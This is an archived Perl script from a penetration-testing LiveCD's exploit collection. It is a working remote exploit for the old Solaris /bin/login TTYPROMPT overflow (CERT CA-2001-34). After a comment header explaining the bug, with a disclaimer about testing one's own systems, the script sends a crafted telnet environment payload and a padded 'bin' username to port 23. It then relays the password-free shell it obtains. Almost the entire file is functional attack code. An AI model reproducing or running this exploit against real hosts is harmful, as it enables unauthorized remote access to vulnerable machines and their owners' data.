home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / system / solaris / remote / login.pl < prev    next >
Encoding:
Perl Script  |  2005-02-12  |  3.4 KB  |  118 lines
  1. #!/usr/bin/perl
  2. #
  3. #  Date: 09/01/2003
  4. #  Author: snooq [http://www.angelfire.com/linux/snooq/]
  5. #
  6. #  I coded this script to demo how to login to a Solaris box without
  7. #  password as 'bin'. Nothing new, it's an old bug which dates back 
  8. #  to Dec 2001.
  10. #  And, there are already several versions of exploits circulating 
  11. #  in the wild for at least a year now. 
  12. #  
  13. #  Due to uninformed/incompetent/ignorant sysadmins, there are still 
  14. #  quite a number of vulnerable machines out there.
  15. #  
  16. #  'root' remote login is not allowed by defaut. So, unless, it's
  17. #  a misconfigured box, you can only go as high as 'bin'. However,
  18. #  once you are dropped into a shell, further priviledge escalation is
  19. #  very possible.
  20. #
  21. #  Background info
  22. #  ===============
  23. #  From http://www.mail-archive.com/bugtraq@securityfocus.com/msg09281.html
  24. #
  25. #  [quote]
  26. #  The problem is there exists an authentication flag called the "fflag" 
  27. #  just after the array that gets overflowed in the .bss segment. This is
  28. #  an array of char pointers so when it is overflowed because of an
  29. #  mismanagement on the indexing of this array the fflag gets overwritten
  30. #  with an valid address on .bss segment. this is good enough to satify 
  31. #  the if(fflag) condition and spawn a shell.
  32. #  [/quote]
  33. #
  34. #  For more info about this bug, go to:
  35. #  http://www.cert.org/advisories/CA-2001-34.html
  36. #
  37. #  Disclaimer
  38. #  ==========
  39. #  This is meant for you to do a quick check own your systems only.
  40. #  The author shall not be held responsible for any illegal use 
  41. #  of this code. 
  42. #
  43. #  -> some asked 'why code another one?' 
  44. #  I'm bored.. I guess.... been using other ppl's tools... it's time 
  45. #  to write my own.. so that I have a reason to feel proud too... 
  46. #  
  47. #  -> again, some asked 'why not in C?'
  48. #  ok... I'm lame.. my C sucks... my Perl sucks too...
  49. #  I'm not a professional programmer anyway... =p
  50. #
  51. #  As usual, any comments or flames, go to jinyean at hotmail.com
  52. #
  53. use Socket;
  54. use FileHandle;
  55.  
  56. if ($ARGV[0] eq '') {
  57.     print "Usage: $0 <host>\n";
  58.     exit;
  59. }
  60.  
  61. $payload="\xff\xfc\x18"        # Won't terminal type
  62.     ."\xff\xfc\x1f"        # Won't negotiate window size
  63.     ."\xff\xfc\x21"        # Won't remote flow control
  64.     ."\xff\xfc\x23"        # Won't    X display location
  65.     ."\xff\xfb\x22"        # Will linemode    
  66.     ."\xff\xfc\x24"        # Won't environment option
  67.     ."\xff\xfb\x27"        # Will new environment option    
  68.     ."\xff\xfb\x00"        # Will binary transmission
  69.     ."\xff\xfa\x27\x00"    # My new environ option
  70.     ."\x00\x54\x54\x59\x50\x52\x4f\x4d\x50\x54"    # 'TTYPROMPT'
  71.     ."\x01\x61\x62\x63\x64\x65\x66"            # 'abcdef', any 6 chars will do
  72.     ."\xff\xf0";        # Suboption end
  73. $port=23;
  74. $user="bin";            # You may change this to another user
  75. $addr=getaddr($ARGV[0]);
  76.  
  77. for ($i;$i<65;$i++) {
  78.     $user.=" c";        # Again, any char will do
  79. }
  80.  
  81. socket(SOCKET,PF_INET,SOCK_STREAM,(getprotobyname('tcp'))[2]);
  82. connect(SOCKET,pack('Sna4x8',AF_INET,$port,$addr,2)) || die "Can't connect: $!\n";
  83.  
  84. print "/bin/login array mismanagment exploit by snooq (jinyean\@hotmail.com)\n";
  85. print "Connected. Wait for a shell....\n";
  86.  
  87. SOCKET->autoflush();
  88.  
  89. $pid=fork;
  90.  
  91. if ($pid) {            # Parent reads    
  92.     send(SOCKET, $payload, 0);
  93.     send(SOCKET, "$user\n", 0);
  94.     read(SOCKET,$buff,69);    # Read the garbage
  95.     while (<SOCKET>) {;
  96.                print STDOUT $_;
  97.         }
  98. }
  99. else {                # Child sends
  100.     print SOCKET while (<STDIN>);
  101.     close SOCKET;
  102. }
  103. exit;
  104.  
  105. sub getaddr {
  106.  
  107.     my $host=($_[0]);
  108.     my $n=$host;
  109.     $n=~tr/\.//d;
  110.  
  111.     if ($n=~m/\d+/) {
  112.         return pack('C4',split('\.',$host));
  113.     }
  114.     else {
  115.         return (gethostbyname($host))[4];
  116.     }
  117. }
  118.